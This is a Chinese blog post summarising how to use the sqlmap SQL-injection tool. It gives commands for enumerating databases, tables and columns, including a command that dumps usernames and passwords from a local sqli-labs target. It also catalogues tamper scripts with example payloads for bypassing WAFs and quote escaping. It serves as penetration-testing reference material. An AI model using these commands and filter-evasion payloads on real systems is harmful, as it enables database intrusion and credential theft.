SQLMAP使用总结

获取可获得信息

sqlmap -r .\test.txt --current-db --current-user --hostname --is-dba

--current-user:当前正在执行相关数据库查询操作的 DBMS 用户
--current-db:当前web应用连接到的数据库名称
在这里插入图片描述
--is-dba:检验当前用户是不是数据库管理员
在这里插入图片描述
--dbs:如果当前会话用户对包含 DBMS 可用数据库信息的系统表有读取权限,则可以枚举出当前数据库列表。

--tables -D:-D指定数据库,列出数据库中所有的表

--columns -T -D:指定数据库名,表名,列出所有的列名。

--dump + 列名 -T指定表名 -D指定数据库名

实战:绕过转义单引号

https://blog.csdn.net/m0_37438418/article/details/79491010
在这里插入图片描述

各种tamper作用

01 apostrophemask.py#用utf8代替引号;Example: ("1 AND '1'='1") '1 AND %EF%BC%871%EF%BC%87=%EF%BC%871'

02 equaltolike.py#MSSQL * SQLite中like 代替等号;Example:  Input: SELECT * FROM users WHERE id=1 ;Output: SELECT * FROM users WHERE id LIKE 1

03 greatest.py#MySQL中绕过过滤’>’ ,用GREATEST替换大于号;Example: ('1 AND A > B') '1 AND GREATEST(A,B+1)=A'

04 space2hash.py#空格替换为#号 随机字符串 以及换行符;Input: 1 AND 9227=9227;Output: 1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227

05 apostrophenullencode.py#MySQL 4, 5.0 and 5.5,Oracle 10g,PostgreSQL绕过过滤双引号,替换字符和双引号;

06 halfversionedmorekeywords.py#当数据库为mysql时绕过防火墙,每个关键字之前添加mysql版本评论;

07 space2morehash.py#MySQL中空格替换为 #号 以及更多随机字符串 换行符;

08 appendnullbyte.py#Microsoft Access在有效负荷结束位置加载零字节字符编码;Example: ('1 AND 1=1') '1 AND 1=1%00'

09 ifnull2ifisnull.py#MySQL,SQLite (possibly),SAP MaxDB绕过对 IFNULL 过滤。 替换类似’IFNULL(A, B)’为’IF(ISNULL(A), B, A)’

10 space2mssqlblank.py(mssql)#mssql空格替换为其它空符号

11base64encode.py#用base64编码j Example: ("1' AND SLEEP(5)#") 'MScgQU5EIFNMRUVQKDUpIw==' Requirement: all

12 space2mssqlhash.py#mssql查询中替换空格

13 modsecurityversioned.py#(mysql中过滤空格,包含完整的查询版本注释;Example: ('1 AND 2>1--') '1 /*!30874AND 2>1*/--'

14 space2mysqlblank.py#(mysql中空格替换其它空白符号

15 between.py#MS SQL 2005,MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0中用between替换大于号(>)

16 space2mysqldash.py#MySQL,MSSQL替换空格字符(”)(’ – ‘)后跟一个破折号注释一个新行(’ n’)

17 multiplespaces.py#围绕SQL关键字添加多个空格;Example: ('1 UNION SELECT foobar') '1 UNION SELECT foobar'

18 space2plus.py#用+替换空格;Example: ('SELECT id FROM users') 'SELECT+id+FROM+users'

19 bluecoat.py#MySQL 5.1, SGOS代替空格字符后与一个有效的随机空白字符的SQL语句。 然后替换=为like

20 nonrecursivereplacement.py#双重查询语句。取代predefined SQL关键字with表示 suitable for替代(例如 .replace(“SELECT”、””)) filters

21 space2randomblank.py#代替空格字符(“”)从一个随机的空白字符可选字符的有效集

22 sp_password.py#追加sp_password’从DBMS日志的自动模糊处理的26 有效载荷的末尾

23 chardoubleencode.py#双url编码(不处理以编码的)

24 unionalltounion.py#替换UNION ALL SELECT UNION SELECT;Example: ('-1 UNION ALL SELECT') '-1 UNION SELECT'

25 charencode.py#Microsoft SQL Server 2005,MySQL 4, 5.0 and 5.5,Oracle 10g,PostgreSQL 8.3, 8.4, 9.0url编码;

26 randomcase.py#Microsoft SQL Server 2005,MySQL 4, 5.0 and 5.5,Oracle 10g,PostgreSQL 8.3, 8.4, 9.0中随机大小写

27 unmagicquotes.py#宽字符绕过 GPC addslashes;Example: * Input: 1′ AND 1=1 * Output: 1%bf%27 AND 1=1–%20

28 randomcomments.py#用/**/分割sql关键字;Example:‘INSERT’ becomes ‘IN//S//ERT’

29 charunicodeencode.py#ASP,ASP.NET中字符串 unicode 编码;

30 securesphere.py#追加特制的字符串;Example: ('1 AND 1=1') "1 AND 1=1 and '0having'='0having'"

31 versionedmorekeywords.py#MySQL >= 5.1.13注释绕过

32 space2comment.py#Replaces space character (‘ ‘) with comments ‘/**/’

33 halfversionedmorekeywords.py#MySQL < 5.1中关键字前加注释

sqlmap 用户手册中文版

地址:https://github.com/kvko/sqlmap-wiki-zhcn

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQLi(Structured Query Language Injection)是一种利用Web应用程序中的安全漏洞,将恶意的SQL代码注入到用户输入的数据中的攻击方法。SQLMap是一种常用的自动化SQL注入工具,它可以帮助安全研究人员找到和利用这些漏洞。 使用SQLMap可以进行各种类型的SQL注入攻击,包括盲注和联合查询注入。在进行盲注时,SQLMap会发送一系列的测试语句,通过观察返回的结果来确定注入点的存在和注入语法的正确性。而在联合查询注入中,SQLMap会利用UNION SELECT语句将恶意代码注入到原始查询中,从而获取数据库中的敏感信息。 在使用SQLMap时,可以通过指定URL和一些参数来执行注入测试。例如,在执行基本的盲注测试时,可以使用以下命令:python sqlmap.py -u 127.0.0.1/sqli/less-38/?id= 1.数据库名 python sqlmap.py -u 127.0.0.1/sqli/less-38/?id= --dbs。这将测试目标URL中的参数id是否存在注入漏洞,并尝试获取数据库名称。 除了执行基本的SQL注入测试外,还可以使用SQLMap执行更复杂的攻击,如获取数据库中的表和列信息,以及获取用户表中的用户名和密码等敏感信息。例如,在注入漏洞被确认后,可以使用以下命令来获取用户表中的用户名和密码:python sqlmap.py -u http://localhost/sqli-labs-master/Less-4/?id=1 -D security -T users -C username,password --dump --batch。 总结来说,SQLi是一种通过注入恶意的SQL代码来攻击Web应用程序的方法,而SQLMap是一种常用的自动化SQL注入工具,可以帮助发现和利用这些漏洞,以获取敏感信息。<span class="em">1</span><span class="em">2</span><span class="em">3</span><span class="em">4</span>

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值